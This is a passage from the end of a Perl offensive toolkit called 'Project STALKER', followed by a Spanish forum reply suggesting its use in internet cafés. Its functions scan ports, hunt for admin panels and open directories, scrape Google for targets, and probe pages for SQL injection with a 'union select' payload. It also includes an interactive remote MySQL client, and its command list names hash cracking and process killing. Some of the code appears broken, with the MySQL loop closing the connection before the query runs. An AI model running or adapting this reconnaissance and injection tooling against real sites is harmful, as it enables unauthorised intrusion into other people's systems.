print "\n[-] Failed the login\n\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
sub scanpaths {
my $urla = $_[0];
print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag) = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}
print "\n\n[+] Finish\n";
}
sub scanport {
my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);
print "[+] Scanning $_[0]\n\n\n";
for my $port(keys %ports) {
if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Finish\n";
}
sub scanpanel {
print "[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
saveyes("logs/panel-logs.txt",$_[0]."/".$path);
}
}
print "\n\n[+] Finish\n";
}
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
my @founds = repes(@founds);
return @founds;
}
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union
".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}
sub get_links {
my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
sub head {
cprint "\x0311"; #13
print "\n\n-- == Project STALKER == --\n\n";
cprint "\x030";
}
sub copyright {
cprint "\x0311"; #13
print"\n\n(C) Doddy Hackman 2011\n\n";
cprint "\x030";
}
sub toma {
return $nave->get($_[0])->content;
}
sub tomax {
return $nave->get($_[0]);
}
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
sub conectar {
my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout => 5);
print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}
sub enter {
my ($host,$user,$pass) = @_;
print "[+] Connecting to the server\n";
$info = "dbi:mysql::".$host.":3306";
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
print "\n[+] Enter in the database";
while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}
$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();
my @columnas = @{$re->{NAME}};
if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}
sub saveyes {
open (SAVE,">>".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}
sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}
sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}
sub helpme {
cprint "\x0310"; #13
print qq(
Commands :
getinfo
getip <host>
getlink <page>
getprocess
killprocess <name process> <pid process>
conec <host> <port> <command>
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
);
cprint "\x030";
}
#
# The End ?
#
Se ve interesante este proyecto!, que te motivo a hacerlo? piensas en añadirle mas funcionalidades? Podría ser muy útil en ciberCafes... jeje ::)